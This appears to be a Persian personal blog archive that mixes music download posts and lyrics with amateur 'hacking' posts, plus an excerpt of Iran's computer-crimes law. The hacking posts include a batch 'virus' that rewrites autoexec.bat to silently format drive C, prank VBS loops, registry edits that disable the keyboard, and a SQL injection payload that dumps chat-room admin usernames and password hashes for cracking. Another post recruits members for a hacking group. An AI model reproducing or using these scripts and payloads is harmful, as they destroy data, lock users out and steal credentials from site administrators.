hacked

سنگینیه سیگارو حس میکنم رویه لب

hacked

سنگینیه سیگارو حس میکنم رویه لب

وبلاگ لوتی من ...

بایگانی

۲۰ مطلب در بهمن ۱۳۹۳ ثبت شده است

کد نرم افزار جدیدم .....

اینم کد نرم افزار جدیدم حتما امتحان کنید ...................

کد رو از این پایین کپی کنید و یک فولدر باز کنید و این کد رو تو نت پد نوشته و آن را سیو از کنید واسم فابل را mr.vbs بزارید و یا با ی اسم دیگه سیو کنید ولی باید پسوندش حتما vbs باشه تا کار کنه .....

بعد این که فابل را داخل فولدری که باز کرده بودید سیو کردید آن را اجرا کنید و حالشو ببرید ......................

نظر از یادتون نره ها ..............


کد :

Set WshShell = WScript.CreateObject("WScript.Shell")
do
WshShell.SendKeys "^+(n)"
WScript.Sleep 500
WshShell.SendKeys "{enter}"
loop

دانلود فول آلبوم دایان بهترین ترانه ها

دانلود آهنگ بسیار زیبا

دانلود آهنگ بسیار زیبای دایان بنام حالم خوب نیست حتما دان کنید ...........


دانلود

آموزش ....


بک ترک یک توزیع لینوکس(که البته در کنار ویندوز هم میشه استفاده کرد مثل خود من) بر اساس GNU است که برای آنالیز و کشف حفره ها و نقاط امنیتی سیستم های مختلف ارائه شده است. این توزیع لینوکس بسیار انعطاف پذیر می باشد و می توانید در هر جایی اقدارم به نصب و استفاده از آن نمایید مثل ماشین مجازی یا فلش مموری و یا هارد دیسک اصلی رایانه خودتان. نسخه ارائه شده ورژن Back Track 5 R3 می باشد که جدید ترین نسخه از این سیستم عامل می باشد که بر عکس نسخه قبل بر اساس Ubuntu می باشد . این توزیع از لینوکس یعنی بک ترک برای کسانی که در امنیت سیستم های رایانه ای و شبکه های فعالیت می کنند می تواند بسیار مفید باشد زیرا دارای ابزار پیشرفته ای برای تست امنیتی از سیستم های رایانه ای و شبکه است. بسیاری از ابزار های هک و شناسایی سیستم های مختلف به طور مجانی در بک ترک در کنار هم قرار داده شده اند که از افراد مبتدی تا حرفه ای می توانند با آن کار کنند. در صورتی به دنبال یک پکیج علی برای رفع نقاط امنیتی سیستم و شبکه خود هستید می توانید از این سیستم عامل که بر پایه لینوکس می باشد استفاده کنید.


ابزار هایی که در این سیستم عامل قرار داده شده اند:


- جمع آوری اطلاعات


- آنالیز شبکه های بیسیم و وایرلس


- شناسایی نقاط ضعیف امنیتی


- بازجویی دیجیتال


- کسب مجوز


- کار روی VOIP


- نقشه یابی و مکان یابی شبکه


- آنالیز و کشف حفره های امنیتی


- آنالیز دقیق برنامه های تحت وب و اینترنت


- مهندسی معکوس


- کسب دسترسی غیر مجاز


لینک های دانلود به صورت مستقیم در هر دو نسخه 32 و 64 بیتی قرار داده شده است.


هر دو نسخه KDE و GNOME به صورت جدا و رایگان قرار داده شده است.


اگر میخواهید که بک ترک را دانلود کنید و همینطور بتونید اموزش دانلود و قسمت های دیگه هم داشته باشید به ادرس زیر برید:(ادرس دانلود اپدیت شد)!


http://www.denadownload.com/%D8%AF%D8%A7%D9%86%D9%84%D9%88%D8%AF-%D8%B1%D8%A7%DB%8C%DA%AF%D8%A7%D9%86-backtrack-5-%D8%A8%DA%A9-%D8%AA%D8%B1%DA%A9/

کلاسیک

واقعا عالیه من که خوشم اومد ... سبکش هم پاپ هستش حتما دانلود کنید 



♫♫ میدونم که یک شب دله ماه میگیره
آسمون ابری و موسیقی میمیره
میدونم که یک شب دله ماه میگیره
آسمون ابری و موسیقی میمیره
هرکی گفت عاشقم پای دار میبرن
سر عاشقارو بیصدا میبورن
دونه دونه ستاره هاماه رو تنها میذارن
یکی یکی اشک میشنو ازچشم ماه میبارن
اما یه روزخورشیدخانوم دوباره برمیگرده
ابرغمو باد میبره ماه دوباره میخنده
شقایقها گل میکونن دوباره عاشق میشن
قصه ی عشق وطنو به غنچه هاشون میگن ♫♫

دانلود آهنگ رپ گاد .......

اولاش یکم چرته ولی بعداش خیلی عالیه حتما گوش بده ضرر نمیکنی .........

 


برای دانلود کلیک کن


امیدوارم خوشت بیاد 


دانلود آهنگ با کیفیت MP3 320

 Busta Rhymes Ft. Eminem - Calm Down

 

دانلود آهنگ با کیفیت MP3 128

Busta Rhymes Ft. Eminem - Calm Down



اینم ی ویروس جدید در سطح تقریبا متوسط ....

بدین منظور:

ابتدا دو فایل REG با نام های Reg-on.REG و Reg-off.REG با برنامه ی Notepad درست کنید.

سپس در فایل Reg-on.REG دستورهای زیر را بنویسید:

 
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="127"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="3"
"WindowsEffect"="3"

 

و در فایل Reg-off.REG نیز دستورهای زیر را وارد کنید:

 

Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Control Panel\Accessibility\Keyboard Response]
"Flags"="126"
[HKEY_CURRENT_USER\Control Panel\Accessibility\SoundSentry]
"Flags"="2"
"WindowsEffect"="0"

 

بدین ترتیب با دبل کلیک بر روی REG-on.REG ویروس فعال شده و بعد از بوت کردن کامپیوتر ویروس عمل کرده و می توانید نحوه کار آن را مشاهده کنید  و با دبل کلیک بر روی Reg-off.REG ویروس غیر فعال شده و با ریبوت دوباره از کار می افتد.

حالا ویروس شما آماده است و شما می توانید برای سرگرمی و نه اذیت و آزار دیگران از آن استفاده کنید.

 

نکات مهم :

1- وقتی بر روی فایل های Reg کلیک می کنید باید بعد از آن yes را بزنید تا فایل ریجستری کار کند.

2- چون این ویروس صفحه کلید را از کار می اندازد در صورت استفاده از چند Acount در ویندوز و دارا بودن پسورد ، پسورد آنها را پاک کنید تا مشکلی پیش نیاید.

3- هر دو فایل را با پسوند .Reg ذخیره کنید (طریقه ذخیره کردن با پسوند .Reg = روی Save As کلیک کرده و Save As Type را روی All Files گذاشته و در قسمت File Name تایپ می کنید Reg-on.REG یا Reg-off.REG و Save را می زنید)

پذیرش انواع سفارش

سلام دوستان 

اگر سفارش خاصی داشتید به ایمیل زیر ارسال کنید .......:

saeedjahantab78@gmail.com


برای ساخت این ویروس باید کد های زیر را در نت پد بنویسید و با فرمت bat. یا همان cmd سیو کنید 

به همین راحتی ......

اینم کد ویروسمون cmd:

 echo off@
call attrib -r -h c:autoexec.bat > nul
echo @echo off > c:autoexec.bat
echo format /autotest c:/q > nul >> c:autoexec.bat
call attrib +r +h c:autoexec.bat > nul
exit

امیدوارم خوشتون بیاد من که عاشق این آهنگم 

واقعا بدنمو به لرزه میندازه حرفاش .....

حالا .....

حتما دانلود کن ....

متن آهنگ :

برام هیچ حسی شبیه تو نیست
کنار تو درگیر آرامشم
همین از تمام جهان کافیه
همین که کنارت نفس میکشم
برام هیچ حسی شبیه تو نیست
تو پایان هر جستجوی منی
تماشای تو عین آرامشه
تو زیباترین آرزوی منی

منو از این عذاب رها نمیکنی
کنارمی به من نگاه نمیکنی

تمام قلب تو به من نمیرسه
همین که فکرمی برای من بسه

از این عادت باتو بودن هنوز
ببین لحظه لحظم کنارت خوشه
همین عادت با تو بودن یه روز
اگه بی تو باشم منو میکشه

یه وقتایی انقدر حالم بده
که میپرسم از هر کسی حالتو
یه روزایی حس میکنم پشت من
همه شهر میگرده دنبال تو

منو از این عذاب رها نمیکنی
کنارمی به من نگاه نمیکنی
تمام قلب تو به من نمیرسه
همین که فکرمی برای من بسه

قانون جرائم رایانه‌ای(پلیس سایبری)

                  ماده1ـ هرکس به طور غیرمجاز به داده‌ها یا سامانه‌های رایانه‌ای یا مخابراتی که به‌وسیله تدابیر امنیتی حفاظت‌شده‌است دسترسی یابد، به حبس از نود و یک روز تا یک‌سال یا جزای نقدی از پنج میلیون (5.000.000) ریال تا بیست میلیون (20.000.000) ریال یا هر دو مجازات محکوم خواهدشد.
 
           مبحث دوم ـ شنود غیرمجاز

           ماده2ـ هر کس به طور غیرمجاز محتوای در حال انتقال ارتباطات غیرعمومی در سامانه‌‌های رایانه‌ای یا مخابراتی یا امواج الکترومغناطیسی یا نوری را شنود کند، به حبس از شش ماه تا دو سال یا جزای نقدی از ده میلیون (10.000.000) ریال تا چهل میلیون (40.000.000) ریال یا هر دو مجازات محکوم خواهدشد.

            مبحث سوم ـ جاسوسی رایانه‌ای

           ماده3ـ هر کس به طور غیرمجاز نسبت به داده‌های سری درحال انتقال یا ذخیره‌شده در سامانه‌های رایانه‌ای یا مخابراتی یا حاملهای داده مرتکب اعمال زیر شود، به مجازاتهای مقرر محکوم خواهدشد:
           الف) دسترسی به داده‌های مذکور یا تحصیل آنها یا شنود محتوای سری در حال انتقال، به حبس از یک تا سه سال یا جزای نقدی از بیست میلیون (20.000.000) ریال تا شصت میلیون (60.000.000) ریال یا هر دو مجازات.
           ب) در دسترس قراردادن داده‌های مذکور برای اشخاص فاقد صلاحیت، به حبس از دو تا ده سال.
           ج) افشاء یا در دسترس قرار دادن داده‌های مذکور برای دولت، سازمان، شرکت یا گروه بیگانه یا عاملان آنها، به حبس از پنج تا پانزده سال.
           تبصره1ـ داده‌های سری داده‌هایی است که افشای آنها به امنیت کشور یا منافع ملی لطمه می‌زند.

دلتنگی

گاهی باید به دور خود دیوار جدایی بکشی نه بخواطر دور شدن از انسان ها 

بلکه ببینی چه کسی برای دیدنت دیوار را خراب میکند .........

من این دیوار را امروز کشیدم ......


معرفی پلیس فتا(پلیس سایبری)

در گذر زمان، با افزایش شناخت، آگاهی و دانش انسان در خصوص پدیده‌ها، نیازها و شیوه‌ی پاسخگویی به آن‌ها، رفته رفته علم و فنّاوری به وجود آمد و مدام در حلقه‌ی پیشرفت قرار گرفت. تا جایی که امروزه این فنّاوری است که بسیاری از شؤون و جنبه‌های زندگی انسان را بازتعریف می‌کند و اگر چه مزایای فراوانی نیز برای او فراهم آورده است، گاه انسان را در پی خود کشیده، تا جایی که ساخته‌ها و پرداخته‌های دست بشر، انسان سرگشته‌ی عصر انفجار اطّلاعات را اسیر خود ساخته و به هر سو که اراده کند، می‌کشد.
نیمه‌ی پایانی قرن بیستم و پس از جنگ جهانی دوّم، دوره‌ی طلایی دانش و فنّاوری بشر و دوره‌ی انتقال از عصر صنعت و ماشین به عصر فنّاوری اطّلاعات است. توسعه‌ی شبکه‌ها با کارکردهای نظامی در ابتدا و توسعه‌ی آن‌ها و تعریف کارکردهای جدید و ایجاد امکان اتّصال مراکز دانشگاهی، پژوهشی، علمی و تبادل اطّلاعات با یکدیگر در این نیمه اتّفاق افتاده‌است. تجاری‌سازی فنّاوری اطّلاعات و ارتباطات و به تبع آن کاهش هزینه‌های رایج و امکان استفاده‌ی عموم از این فنّاوری، اینترنت را به معنای امروز آن در دهه‌ی پایانی قرن بیستم به مردم معرّفی نمود و امروزه این فنّاوری عظیم با میلیاردها رایانه، میلیون‌ها خدمات‌دهنده و صدها هزار شاه‌راه ارتباطی اصلی در برابر بشر قرار دارد تا از مواهب و مزایای بی‌بدیل آن استفاده کند یا خود را با پلیدی‌ها و آسیب‌های آن به نابودی کشد.
رایانه، اینترنت و تمامی ابزارهای مبتنی بر فنّاوری اطّلاعات و ارتباطات، در ابتدا و در ذهن و تصمیم مبدعان و مخترعان آن، صرفاً با هدف خدمت به نوع بشر و ساده‌سازی و افزایش کیفیت زندگی انسان، طرّاحی و تولید شدند. امّا در عمل تبدیل به چاقوی دولبه‌ی گشتند که سعادت و شقاوت را هم‌زمان با هم به ارمغان می‌آورند و شهروند امروز دهکده‌ی دیجیتالی جهانی را در برابر یک انتخاب و یک سؤال بزرگ قرار داده‌است که «آیا انسان نیازمند بازتعریف نیازها، خواسته‌ها، منافع و مضارّ خود در فضای به اصطلاح جدید مجازی است؟»
فنّاوری اطّلاعات و ارتباطات ضمن تأثیرگذاری بر تمامی جنبه‌ها و شؤون زندگی اجتماعی بشر، بر جرایم، تهدیدها و آسیب‌ها نیز تأثیر گذاشته است. بسیاری از جرایم قدیمی با استفاده از ابزارهای رایانه‌ای با سهولت، اثرگذاری و منافع بیشتر برای مجرمین از سوی آنان صورت می‌گیرند و حتّی دسته‌ی دیگری از جرایم که کاملاً جدید بوده و صرفاً اختصاص به فضای مجازی دارند نیز شکل گرفته و در قاموس مجرمین از منظر ارتکاب و در قاموس پلیس از منظر پی‌جویی و مقابله وارد شده‌اند.

 جرایم رایانه‌ای
همزمان با توسعه و کاربردپذیری رایانه و سیستم‌های رایانه‌ای، جرایم رایانه‌ای هم به وجود آمده‌اند. اگرچه دامنه و حوزه‌ی وقوع جرم در هر حوزه با توجّه به ویژگی‌ها و وسعت کاربرد و استفاده متفاوت بوده‌است. از سال 1960 میلادی تا کنون سه نسل از جرایم رایانه‌ای برشماری شده‌اند. نسل اوّل که مقارن سال‌های دهه‌ی هشتاد، هفتاد و اوایل دهه‌ی هشتاد میلادی است و چون استفاده از اینترنت در آن زمان شیوع نداشت، عمده‌ی جرایم مرتبط با رایانه‌ها بود و از این رو این دسته از جرایم صرفاً به «جرایم رایانه‌ای» یاد می‌شوند. نسل دوّم جرایم رایانه‌ای از اوایل دهه‌ی هشتاد تا اوایل دهه‌ی نود به وقوع پیوستند که به «جرایم علیه داده‌ها» تعبیر می‌شوند. در این نسل، «داده» صرف‌نظر از این‌که در رایانه قرار داشته باشد، در واسط‌ها و ابزارهای انتقال مورد توجّه قرار گرفت و دیگر تأکیدی بر رایانه نبود. نسل سوّم رایانه‌ای نیز هم‌زمان با فراگیر شدن اینترنت از اوایل دهه‌ی 1990 میلادی به وجود آمدند. این جرایم که با گسترش کاربرد شبکه و اینترنت به وجود آمدند نام «جرایم سایبری» را به خود گرفتند.

اموزش هک چت روم های هاست

خوب با یک اموزش دیگه در خدمتونم این بار با اموزش هک چت روم های هاست به هاست خوب این کار خیلی ساده است اول میرید تو یک چت روم که رو سرورو هاست به هاست باهش بعد تو قسمت امتیازت کلیک می کنیدبعد یک کد هستش که اونوتو قسمت جستجو می کنید بعد اسم مدیر ها میاد و چند تا کد جلوشون کدشو کپی کنید و میرید به سایت md5online.org بعدش اون کدو تو کپی یم کنید اینتر میزنید و اخرش رمز میاد براتون ...

اینم کد فقط از این کد در صورت نیاز استفاده کنید قصد ما آدم ازاری نیست 


union select 1,2,3,4,5,6,7,8,9,10,group_concat(etchat_username,0x3a,etchat_userpw),12,13,14,15,16,17 from db1_etchat_user where etchat_userprivilegien='admin'-- and 'x'='x
 



اطلاعیه

کسانی که هک بلدند .........
خواهشا به ما اطلاع دهند 
ما می خواهیم یک گروه هک درست کنیم برای هک سایت های غیر اخلاقی (مبتضل)
برای عضویت در گروه ایمیل خود را بصورت خصوصی به ما بفرستید 
ممنونم 

متین دو هنجره حتما دانلود کنید

پدر راک که میگن اینه 



دانلود موزیک ویدیو با کیفیت عالی (HD)

متین دو حنجره - مرگ بر من


دانلود موزیک ویدیو با کیفیت عالی (FULL HD)

متین دو حنجره - مرگ بر من

تمام

کد ساده ترین ویروس که خودم نوشتم

این ویروس کاملا بی خظر است و وقتی کار میکنه که روی آن کلیک کنید 

این ویروس برای ترساندن طرف به کار میرود یا شوخی های هک .....

و این ویروس بعد از ریستارت کتمپیوتر از کار میوفته 

کد:

do
msgbox("hacked hahahaha...")
msgbox("mr.s-j")
loop

این کد را در نت پد بنویسید و در آخر به سیو از بروید و بعد از وارد کردن اسم سند خود نقطه vbsرا تایپ کنید مثلا اگر اسم سند mr است باید mr.vbsتایپ کنید و سیو کنید و بعد آن را اجرا کنید 

موفق باشید 

آموزش گام به گام بک ترک کالی



بک ترک یک سیستم عاملی است که در واقع سیستم یک هکر واقعی است که امکان هک 

(وای فای .سایت ....)را به هکر میدهد 

ولی اگر کسی استفاده درست از این برنامه را بلد نباشد 100%پی گرد قانونی دارد و یک جرم محسوب میشود 

در این پست آموزش گام به گام بک ترک را گذاشته ایم 

البته بک ترک کالی یعنی آخرین ورژن بک ترک 

برای دریافت لینک دانلود باید یک عدد شارژ ایرانسل 10 هزاری به صورت خصوصی به ما فرستاده شود 

و همراه آن ایمیل خود را نیز وارد کنید تا ما لینک را به ایمیل شما بفرستیم 

مطمئن باشید بعد تا 24 ساعت آینده لینک دانلود بک ترک و پی دی اف آموزشی که برای شما عزیزان ساخته ایم فرستاده میشود 

در صورتی که لینک را دریافت نکردید 

خواهشن به ایمیل زیر عدد 1 را بفرستید تا درستی ایمیل شما تایید شود در صورت درستی لینک دانلود برای شما ارسال خواهد شد

HACKER99995BLACK@GMAIL.COM 

حجم بک ترک :2GB

حجم پی دی اف :98KB


متشکریم 

black hat hacker